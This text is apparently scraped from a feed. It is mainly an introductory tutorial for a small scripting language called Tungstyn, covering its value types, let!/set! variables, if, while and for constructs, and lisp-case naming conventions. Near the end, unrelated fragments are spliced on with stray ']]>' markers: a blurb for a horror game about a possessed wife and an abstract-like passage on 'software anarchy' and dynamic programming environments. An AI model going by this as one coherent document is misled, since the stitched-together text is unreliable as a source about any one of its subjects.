As of now, Tungstyn has 8 types: null, int, float, string, list, map, externcommand, and command.
The null type has no data; sometimes returned from functions when an error occurs, or stored in a structure when a field is uninitialized. It can be created via the keyword null.
An int is a 64-bit signed integer. They can be created via integer literals (e.g. 1, 2, 1000, 203, etc.)
A float a 64-bit floating point number. They can be can be created via float literals (e.g. 1.0, 23.5, 3.14159, 5., etc.)
A string is a sequence of characters. They can be any length, and can contain the null character (U+0000). Any sequence of characters, excluding control characters (;, , [, ], ", $, and :) creates a string (e.g. abcd is a string literal for "abcd"). They can also be quoted (e.g. "Hello, World!") in which case they can contain control characters. Inside a quoted string, escape codes may also be used (e.g. "Hello\nWorld").
A list is a sequence of values. They can be created via the list command, which has been discussed previously.
A map consists of key-value pairs, with each key only being mapped to a single value, and where the keys are strings. They can be created via the map command, which takes a sequence of key-value pairs and creates a map from them.
e.g:
let! $m [map
a 0
abcd 2
x [+ 2 3]
y 9
];
An externcommand is a command implemented in C. Most builtin commands are of this type. They can not be created from within Tungstyn.
A command is a command implemented in Tungstyn. They can be created via the cmd command, which takes a sequence of arguments then an expression.
e.g:
let! $double [cmd $x [* $x 2]];
echoln [double 20]; # echoes 40
As mentioned before, variables are prefixed with $, and this is to distinguish them from string literals. A variable can be declared with let!, and reassigned with set!.
For example:
let! $x 10;
# $x is now declared
echoln $x; # 10
let! $y [+ $x 2];
echoln $y; # 12
# $x has already been declared, so we reassign it with set!
set! $x [+ $x 1];
echoln $x; # 11
So, that's all the value types. As for control constructs, Tungstyn has all the ones you'd expect (for, while, if). Here's how those work:
do does the block that it is given.
do [+ 1 2]
returns 3.
Before we discuss if, here are some conditional commands:
=: Detects if two values are equal.
!=: Detects if two values are not equal.
> < >= <=: Comparisons on numeric types.
These conditions return 1 if true, and 0 if false.
Tungstyn's if is more similar to a cond block rather than a traditional if. It can test as many conditions as is necessary, and can also contain an else condition. Here's an if with just one condition:
if [= $x 2] [
echoln "x is 2!";
];
This will echo x is 2! if $x is equal to 2, as you'd expect. However, in an if, you can check multiple different conditions:
if
[< $x 2] [echoln "x is less than 2"]
[= $x 2] [echoln "x is 2"]
[< $x 10] [echoln "x is between 3 and 9"]
# else condition
[echoln "x is greater than 9"];
if also returns the value where the condition returns true, so this could be condensed to:
echoln [if
[< $x 2] "x is less than 2"
[= $x 2] "x is 2"
[< $x 10] "x is between 3 and 9"
"x is greater than 9"
];
which does the same thing, but with less repitition.
while continually executes a block while a condition is active.
let! $x 0;
while [< $x 10] [
set! $x [+ $x 1];
echoln $x;
]
will echo the following:
1
2
3
4
5
6
7
8
9
10
for iterates over a collection (such as a map or a list). You can optionally keep track of the index of the value.
for $x [list 1 2 3] [
echoln $x
]
echoes
1
2
3
If you want to iterate from a start value to an end value, use the range command to construct a list containing all values you wish to iterate over.
# prints all numbers between 0 1 2 3 ... 9
for $x [range 0 10] [
echoln $x
];
# you can also leave out the start in range if it's 0
# does the same thing
for $x [range 10] [
echoln $x;
];
set! $l [list 1 2 3];
# keep track of index each time
for $i $x $l [
$l:set! $i [+ $x 1];
];
# you can iterate over maps, too.
let $m [map
a 2
b 3
some-key 20
];
# a = 2
# b = 3
# etc.
# (possibly not in that order)
for $key $value $m [
echoln $key = $value;
];
As for control constructs, that's about it.
What follows aren't hard language rules; rather just some conventions about naming. You don't have to follow these rules; you should write code whichever way makes the most sense to you. But these are the rules used in the standard library, so they're worth remembering.
The names of commands and variables in the standard library use lisp-case. You may also have noticed the presence of an exclamation mark (!) at the end of the names of some commands. This is appended to any command that modifies state, whether that be the state of a passed-in value (such as list:set! or string:slice!) or the state of the interpreting context (like let! or set!). In the other documentation files, you'll notice that the mutable (the one with !) and immutable (the one without !) versions of the same command will be listed next to eachother. Typically, the immutable version will create a copy of the data structure, and then modify that, while the mutable version will directly modify the existing structure.
For reasons explained in the readme, the file extension for Tungstyn code should be .w.
That's the end of the introduction. Hopefully you should be able to write some Tungstyn code now. If you want to, you can view the other files within this folder, which contain more information on the currently existing commands. You could also check under the examples/ directory, which shows some examples of Tungstyn code.
Married to the Devil is a short horror game in which the protagonist's wife is possessed by a demon.
This game is in its very early stages and will likely not be released soon. I will post regular development updates as I progress.
]]>A liberatory technology provides an improvement in the work which can be done with some amount of effort and time. A community which utilises such a technology well can perform much more work independently. We believe a liberatory technology for programmers takes the form of a dynamic environment, which is a property of some programming languages and implementations that allows for many forms of modification and inspection at any time while a program is running.
We will also investigate the supposed disadvantages of a decen- tralised development strategy, and how they may instead be used to the advantage of a community. We also will present why it is desirable to distribute source materials, especially in software development, and how shunning distributing source materials as anti-capitalist “praxis” is nonsensical. Finally, we will discuss what an anti-hierarchical view of some communication networks can bring to light; especially with community moderation systems, the property relationships a user con- jures with their environment, and how to remove as many constraints on the means of communication and presentation as possible.
We hold the belief that software peer production while rejecting the potential of dynamic environments is, at best, incoherent, and that a user of dynamic environments outside peer production may well have problems applying the environment as much as they could have. We try to achieve a few aims with this book: to introduce the reader to an idea of software anarchy, to investigate some common opposition to it, and to provide a wide selection of resources that a reader (whom can produce enough free time) can read to help develop their own approaches.
]]>